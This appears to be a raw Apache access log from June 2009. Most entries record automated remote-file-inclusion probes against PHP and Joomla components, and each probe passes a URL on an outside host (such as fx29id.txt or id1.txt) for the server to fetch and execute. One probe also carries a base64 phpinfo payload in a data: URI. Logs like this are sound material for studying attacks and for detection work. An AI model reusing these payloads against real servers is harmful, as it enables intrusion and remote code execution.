124.138.156.3 - - [28/Jun/2009:04:44:31 -0400] "GET /logs/access_log.Q109060400/errors.php?error=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.249.71.204 - - [28/Jun/2009:04:45:26 -0400] "GET /logs/access_log.Q107110900 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [28/Jun/2009:04:46:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.202.2.220 - - [28/Jun/2009:04:47:00 -0400] "GET /logs/access_log.Q109061700/errors.php?error=http://www.kcorea.co.kr:8080/~kcorea/lib/v.jpg??%0D? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
211.202.2.220 - - [28/Jun/2009:04:47:00 -0400] "GET /errors.php?error=http://www.kcorea.co.kr:8080/~kcorea/lib/v.jpg??%0D? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
211.202.2.220 - - [28/Jun/2009:04:47:15 -0400] "GET /logs/errors.php?error=http://www.kcorea.co.kr:8080/~kcorea/lib/v.jpg??%0D? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
211.202.2.220 - - [28/Jun/2009:04:47:15 -0400] "GET /logs/access_log.Q109060400/errors.php?error=http://www.kcorea.co.kr:8080/~kcorea/lib/v.jpg??%0D? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
209.59.12.99 - - [28/Jun/2009:04:51:08 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.174.40.130 - - [28/Jun/2009:04:51:41 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://201.16.248.189/manual/howto/bot_site.gif? HTTP/1.1" 404 301 "-" "libwww-perl/5.79"
200.174.40.130 - - [28/Jun/2009:04:51:42 -0400] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://201.16.248.189/manual/howto/bot_site.gif? HTTP/1.1" 404 274 "-" "libwww-perl/5.79"
200.174.40.130 - - [28/Jun/2009:04:51:42 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://201.16.248.189/manual/howto/bot_site.gif? HTTP/1.1" 404 279 "-" "libwww-perl/5.79"
218.234.21.178 - - [28/Jun/2009:04:52:16 -0400] "GET /logs/access_log.Q109050800/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
218.234.21.178 - - [28/Jun/2009:04:52:16 -0400] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
218.234.21.178 - - [28/Jun/2009:04:52:16 -0400] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
218.234.21.178 - - [28/Jun/2009:04:52:22 -0400] "GET /logs/access_log.Q109052900/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
218.234.21.178 - - [28/Jun/2009:04:53:29 -0400] "GET /logs/access_log.Q109051800/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
65.23.158.226 - - [28/Jun/2009:04:53:37 -0400] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
65.23.158.226 - - [28/Jun/2009:04:53:37 -0400] "GET /logs/access_log.Q109050800/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
65.23.158.226 - - [28/Jun/2009:04:53:37 -0400] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
65.23.158.226 - - [28/Jun/2009:04:53:41 -0400] "GET /logs/access_log.Q109050800/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
65.23.158.226 - - [28/Jun/2009:04:53:41 -0400] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
65.23.158.226 - - [28/Jun/2009:04:53:41 -0400] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
65.23.158.226 - - [28/Jun/2009:04:53:41 -0400] "GET /logs/access_log.Q109052900/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
65.23.158.226 - - [28/Jun/2009:04:53:45 -0400] "GET /logs/access_log.Q109052900/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
218.234.21.178 - - [28/Jun/2009:04:54:11 -0400] "GET /logs/access_log.Q109050800/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
218.234.21.178 - - [28/Jun/2009:04:54:11 -0400] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
218.234.21.178 - - [28/Jun/2009:04:54:11 -0400] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
218.234.21.178 - - [28/Jun/2009:04:54:22 -0400] "GET /logs/access_log.Q109051800/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
218.234.21.178 - - [28/Jun/2009:04:54:59 -0400] "GET /logs/access_log.Q109052900/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
83.13.191.186 - - [28/Jun/2009:04:55:05 -0400] "GET /logs/access_log.Q109061300/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
83.13.191.186 - - [28/Jun/2009:04:55:05 -0400] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
83.13.191.186 - - [28/Jun/2009:04:55:05 -0400] "GET /logs/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
83.13.191.186 - - [28/Jun/2009:04:55:06 -0400] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
83.13.191.186 - - [28/Jun/2009:04:55:06 -0400] "GET /logs/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
83.13.191.186 - - [28/Jun/2009:04:55:06 -0400] "GET /logs/access_log.Q109061300/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
83.13.191.186 - - [28/Jun/2009:04:55:21 -0400] "GET /logs/access_log.Q109052000/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
83.13.191.186 - - [28/Jun/2009:04:55:24 -0400] "GET /logs/access_log.Q109052000/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
211.202.2.220 - - [28/Jun/2009:04:55:41 -0400] "GET /logs/access_log.Q109053100//?path%5Bdocroot%5D=http://www.kcorea.co.kr:8080/~kcorea/lib/v.jpg??%0D? HTTP/1.1" 404 226 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
211.202.2.220 - - [28/Jun/2009:04:55:41 -0400] "GET //?path%5Bdocroot%5D=http://www.kcorea.co.kr:8080/~kcorea/lib/v.jpg??%0D? HTTP/1.1" 200 452 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
211.202.2.220 - - [28/Jun/2009:04:55:41 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.kcorea.co.kr:8080/~kcorea/lib/v.jpg??%0D? HTTP/1.1" 200 7319 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
209.59.12.99 - - [28/Jun/2009:04:56:08 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
59.125.5.1 - - [28/Jun/2009:04:56:21 -0400] "GET //?path%5Bdocroot%5D=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
59.125.5.1 - - [28/Jun/2009:04:56:22 -0400] "GET /logs/error_log.Q109051200%20%20//?path%5Bdocroot%5D=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
59.125.5.1 - - [28/Jun/2009:04:56:27 -0400] "GET /logs/access_log.Q109051900%20%20//?path%5Bdocroot%5D=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
59.125.5.1 - - [28/Jun/2009:04:56:27 -0400] "GET /logs//?path%5Bdocroot%5D=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 7319 "-" "Mozilla/5.0"
200.174.40.130 - - [28/Jun/2009:04:56:52 -0400] "GET /logs/access_log.Q109060600//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://201.16.248.189/manual/howto/bot_site.gif? HTTP/1.1" 404 301 "-" "libwww-perl/5.79"
211.202.2.220 - - [28/Jun/2009:04:57:03 -0400] "GET /logs/access_log.Q109051200//?path%5Bdocroot%5D=http://www.kcorea.co.kr:8080/~kcorea/lib/v.jpg??%0D? HTTP/1.1" 404 226 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
66.249.71.204 - - [28/Jun/2009:04:57:27 -0400] "GET /logs/access_log.Q108082900 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
64.40.150.211 - - [28/Jun/2009:04:57:35 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
64.40.150.211 - - [28/Jun/2009:04:57:36 -0400] "GET /logs/access_log.Q109052800//include/bbs.lib.inc.php?site_path=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
64.40.150.211 - - [28/Jun/2009:04:57:36 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
83.13.191.186 - - [28/Jun/2009:04:58:44 -0400] "GET /logs/access_log.Q109061300%20%20/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
83.13.191.186 - - [28/Jun/2009:04:58:46 -0400] "GET /logs/access_log.Q109061300%20%20/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
83.13.191.186 - - [28/Jun/2009:04:58:52 -0400] "GET /logs/access_log.Q109052000%20%20/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
83.13.191.186 - - [28/Jun/2009:04:58:54 -0400] "GET /logs/access_log.Q109052000%20%20/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
64.40.150.211 - - [28/Jun/2009:04:59:27 -0400] "GET /logs/access_log.Q109052800%20%20//include/bbs.lib.inc.php?site_path=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
58.227.193.198 - - [28/Jun/2009:05:01:05 -0400] "GET /logs/access_log.Q109052800//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jun/2009:05:01:24 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
123.242.165.138 - - [28/Jun/2009:05:02:37 -0400] "GET /logs/access_log.Q109051800/appserv/main.php?appserv_root=http://www.suntalent.com.tw/appserv/id???? HTTP/1.1" 404 241 "-" "libwww-perl/5.79"
123.242.165.138 - - [28/Jun/2009:05:02:38 -0400] "GET /appserv/main.php?appserv_root=http://www.suntalent.com.tw/appserv/id???? HTTP/1.1" 404 214 "-" "libwww-perl/5.79"
123.242.165.138 - - [28/Jun/2009:05:02:43 -0400] "GET /logs/appserv/main.php?appserv_root=http://www.suntalent.com.tw/appserv/id???? HTTP/1.1" 404 219 "-" "libwww-perl/5.79"
69.94.125.100 - - [28/Jun/2009:05:03:52 -0400] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.rustrubprom.ru/adm/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
69.94.125.100 - - [28/Jun/2009:05:03:52 -0400] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.rustrubprom.ru/adm/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
69.94.125.100 - - [28/Jun/2009:05:03:52 -0400] "GET /logs/access_log.Q109061400%20%20/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.rustrubprom.ru/adm/id1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
69.94.125.100 - - [28/Jun/2009:05:03:57 -0400] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.rustrubprom.ru/adm/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
69.94.125.100 - - [28/Jun/2009:05:03:57 -0400] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.rustrubprom.ru/adm/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
69.94.125.100 - - [28/Jun/2009:05:03:57 -0400] "GET /logs/access_log.Q109061400/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.rustrubprom.ru/adm/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
62.140.23.192 - - [28/Jun/2009:05:04:02 -0400] "GET /logs/access_log.Q109051700//include/print_category.php?setup[use_category]=1&dir=data:;base64,PD9waHBpbmZvKCk7Lyo=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 252 "-" "libwww-perl/5.803"
62.140.23.192 - - [28/Jun/2009:05:04:02 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=data:;base64,PD9waHBpbmZvKCk7Lyo=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
62.140.23.192 - - [28/Jun/2009:05:04:02 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=data:;base64,PD9waHBpbmZvKCk7Lyo=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 230 "-" "libwww-perl/5.803"
69.94.125.100 - - [28/Jun/2009:05:04:17 -0400] "GET /logs/access_log.Q109051700%20%20/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.rustrubprom.ru/adm/id1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
211.202.2.220 - - [28/Jun/2009:05:04:23 -0400] "GET /logs/access_log.Q109061500//?path%5Bdocroot%5D=http://www.kcorea.co.kr:8080/~kcorea/lib/v.jpg??%0D? HTTP/1.1" 404 226 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
58.227.193.198 - - [28/Jun/2009:05:04:29 -0400] "GET /logs/access_log.Q109051100//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
62.140.23.192 - - [28/Jun/2009:05:04:35 -0400] "GET /logs/error_log.Q109051700//include/print_category.php?setup[use_category]=1&dir=data:;base64,PD9waHBpbmZvKCk7Lyo=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 251 "-" "libwww-perl/5.803"
217.147.29.190 - - [28/Jun/2009:05:05:15 -0400] "GET //main.php?sayfa=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:05:05:15 -0400] "GET /logs//main.php?sayfa=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:05:05:15 -0400] "GET /logs/access_log.Q109051000//main.php?sayfa=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:05:05:15 -0400] "GET /logs/access_log.Q109051800//main.php?sayfa=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
69.94.125.100 - - [28/Jun/2009:05:05:24 -0400] "GET /logs/access_log.Q109061400/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.rustrubprom.ru/adm/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
69.94.125.100 - - [28/Jun/2009:05:05:56 -0400] "GET /logs/access_log.Q109061400%20%20/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.rustrubprom.ru/adm/id1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
72.30.142.179 - - [28/Jun/2009:05:06:12 -0400] "GET /logs/access_log.Q108102300 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
69.94.125.100 - - [28/Jun/2009:05:06:18 -0400] "GET /logs/access_log.Q109051700%20%20/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.rustrubprom.ru/adm/id1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jun/2009:05:06:24 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
131.203.76.246 - - [28/Jun/2009:05:07:50 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
131.203.76.246 - - [28/Jun/2009:05:07:50 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
131.203.76.246 - - [28/Jun/2009:05:07:50 -0400] "GET /logs/error_log.Q109061900%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
131.203.76.246 - - [28/Jun/2009:05:08:23 -0400] "GET /logs/access_log.Q109061900%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
59.125.5.1 - - [28/Jun/2009:05:08:42 -0400] "GET /logs/access_log.Q109053100//?path%5Bdocroot%5D=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
123.242.165.138 - - [28/Jun/2009:05:08:45 -0400] "GET /logs/access_log.Q109060100/appserv/main.php?appserv_root=http://www.suntalent.com.tw/appserv/id???? HTTP/1.1" 404 241 "-" "libwww-perl/5.79"
217.147.29.190 - - [28/Jun/2009:05:09:29 -0400] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.rustrubprom.ru/adm/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
217.147.29.190 - - [28/Jun/2009:05:09:29 -0400] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.rustrubprom.ru/adm/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
66.249.71.204 - - [28/Jun/2009:05:09:30 -0400] "GET /logs/access_log.Q107111000 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
59.125.5.1 - - [28/Jun/2009:05:09:34 -0400] "GET /logs/access_log.Q109051200//?path%5Bdocroot%5D=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
131.203.76.246 - - [28/Jun/2009:05:11:20 -0400] "GET /logs/error_log.Q109061900/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jun/2009:05:11:23 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.71.16 - - [28/Jun/2009:05:11:26 -0400] "GET /images/items/682425_full.jpg HTTP/1.1" 200 7773 "-" "Googlebot-Image/1.0"
216.17.99.13 - - [28/Jun/2009:05:13:55 -0400] "GET /logs/access_log.Q109061100//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.17.99.13 - - [28/Jun/2009:05:13:55 -0400] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.17.99.13 - - [28/Jun/2009:05:13:55 -0400] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
216.17.99.13 - - [28/Jun/2009:05:13:58 -0400] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.17.99.13 - - [28/Jun/2009:05:13:58 -0400] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
216.17.99.13 - - [28/Jun/2009:05:13:58 -0400] "GET /logs/access_log.Q109061100%20%20//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.17.99.13 - - [28/Jun/2009:05:14:04 -0400] "GET /logs/access_log.Q109052100%20%20//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.17.99.13 - - [28/Jun/2009:05:14:04 -0400] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.17.99.13 - - [28/Jun/2009:05:14:04 -0400] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
216.17.99.13 - - [28/Jun/2009:05:14:04 -0400] "GET /logs/access_log.Q109061100//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.17.99.13 - - [28/Jun/2009:05:14:07 -0400] "GET /logs/access_log.Q109052100//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
203.151.217.29 - - [28/Jun/2009:05:15:03 -0400] "GET //administrator/components/com_moofaq/css/file_includer.php?file=http://www.usher.co.kr//flvPlay/fx29id.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
203.151.217.29 - - [28/Jun/2009:05:15:03 -0400] "GET /logs//administrator/components/com_moofaq/css/file_includer.php?file=http://www.usher.co.kr//flvPlay/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
203.151.217.29 - - [28/Jun/2009:05:15:03 -0400] "GET /logs/access_log.Q109061800//administrator/components/com_moofaq/css/file_includer.php?file=http://www.usher.co.kr//flvPlay/fx29id.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
203.151.217.29 - - [28/Jun/2009:05:15:07 -0400] "GET /logs/access_log.Q109061500//administrator/components/com_moofaq/css/file_includer.php?file=http://www.usher.co.kr//flvPlay/fx29id.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jun/2009:05:16:24 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
